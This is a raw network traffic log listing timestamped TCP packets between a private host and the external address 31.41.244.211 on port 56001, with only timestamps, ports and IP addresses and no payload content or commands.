Oct 13, 2024 18:16:34.554729939 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.554747105 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.554761887 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.554770947 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.554792881 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.554805994 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.554827929 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.554842949 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.554851055 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.554928064 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.554979086 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.593511105 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.593534946 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.593604088 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.593616009 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.593630075 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.593688965 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.593702078 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.593714952 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.593729019 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.593801022 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.593827009 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.593842030 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.593864918 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.593878031 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.593892097 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.593914986 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.593930006 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.593941927 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.593950033 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.593977928 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.594002962 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.594031096 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.594085932 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.594099998 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.594110012 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.594137907 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.594151974 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.594162941 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.594182968 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.594203949 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.594320059 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.594335079 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.594347954 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.594355106 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.594369888 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.594382048 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.594393969 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.594393969 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.594486952 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.594526052 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.594575882 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.594741106 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.594753981 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.594768047 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.594789028 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.594804049 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.594813108 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.594825029 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.594841003 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.594852924 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.594866991 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.594876051 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.594902039 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.594929934 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.595082998 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.595098019 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.595112085 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.595174074 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.595180988 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.595192909 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.595208883 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.595222950 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.595257044 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.595293999 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.595303059 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.595323086 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.595336914 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.595355988 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.595370054 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.595390081 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.595407963 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.595417023 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.595446110 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.595454931 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.595464945 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.595567942 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.598505020 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.598570108 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.598592043 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.598606110 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.598628044 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.598640919 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.598649979 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.598663092 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.598687887 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.598711014 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.598723888 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.598733902 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.598747015 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.598759890 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.598771095 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.598783970 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.598839045 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.598855019 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.598867893 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.598887920 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.598928928 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.598938942 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.598938942 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.598953962 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.599001884 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.599014997 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.599026918 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.599036932 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.599054098 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.599071980 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.599080086 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.599096060 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.599118948 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.599149942 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.599380970 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.599412918 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.599426985 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.599477053 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.599541903 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.599555969 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.599569082 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.599592924 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.599600077 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.599613905 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.599625111 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.599637032 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.599652052 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.599663973 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.599704981 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.599852085 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.599895000 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.599908113 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.599921942 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.599935055 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.599947929 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.599962950 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.599971056 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.600053072 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.600080967 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.600094080 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.600106955 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.600120068 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.600133896 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.600143909 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.600157976 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.600392103 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.600414991 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.600429058 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.600439072 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.600496054 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.600508928 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.600522995 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.600537062 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.600545883 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.600558996 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.600583076 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.600583076 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.643065929 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.643110037 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.643202066 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.643218040 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.643229008 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.643245935 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.643266916 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.643286943 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.643301964 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.643311024 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.643337011 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.643505096 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.643524885 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.643539906 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.643567085 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.643573999 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.643587112 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.643599987 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.643610954 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.643636942 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.643661976 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.682439089 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.682461977 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.682476997 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.682508945 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.682554960 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.682662010 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.682676077 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.682689905 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.682766914 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.682775974 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.682789087 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.682802916 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.682811975 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.682826042 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.682959080 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.682976007 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.682990074 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.683003902 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.683017015 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.683031082 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.683041096 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.683048964 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.683062077 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.683093071 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.683111906 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.683140993 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.683154106 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.683162928 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.683176041 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.683187008 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.683202982 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.683231115 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.683243990 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.683257103 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.683270931 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.683284044 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.683291912 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.683300018 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.683314085 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.683516026 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.683552980 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.683566093 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.683588028 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.683607101 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.683615923 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.683630943 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.683643103 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.683660030 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.683666945 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.683679104 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.683691025 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.683706999 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.683721066 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.683733940 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.683743000 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.683756113 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.683842897 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.683974981 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.683988094 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.684001923 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.684015036 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.684027910 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.684036016 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.684048891 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.684062004 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.684071064 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.684083939 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.684103966 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.684197903 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.688970089 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.693945885 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.694081068 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.699016094 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:35.122936964 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:35.123006105 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:39.709547043 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:39.714442968 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:51.411459923 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:51.416971922 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:51.423465014 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:51.428596020 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:51.856362104 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:51.909414053 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:52.036302090 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:52.040311098 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:52.298048019 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:52.298125029 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:52.301493883 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:52.301563978 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:52.306463003 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:59.941293001 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:59.946505070 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:59.946573973 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:59.951497078 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:00.360395908 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:00.409459114 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:17:00.527532101 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:00.529875994 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:17:00.534801006 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:00.534857035 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:17:00.539674997 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:04.581732988 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:17:04.587110043 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:04.587182045 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:17:04.592650890 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:05.010102987 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:05.097074032 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:17:05.184230089 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:05.192266941 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:17:05.197238922 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:05.197314978 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:17:05.202244997 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:05.206618071 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:17:05.211510897 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:05.211936951 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:17:05.216845989 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:05.606631994 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:05.778345108 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:05.778420925 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:17:05.781347036 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:17:05.786250114 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:05.786303043 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:17:05.791140079 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:13.003901958 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:17:13.009021044 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:13.009177923 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:17:13.014046907 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:13.431910038 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:13.475466967 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:17:13.606081009 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:13.618338108 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:17:13.623266935 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:13.623478889 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:17:13.628360033 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:17.287467003 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:17:17.292594910 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:17.295552015 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:17:17.300555944 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:17.697263002 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:17:17.750725985 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:17:17.872014046 CEST	56001	49732	31.41.244.211	192.168.2.4
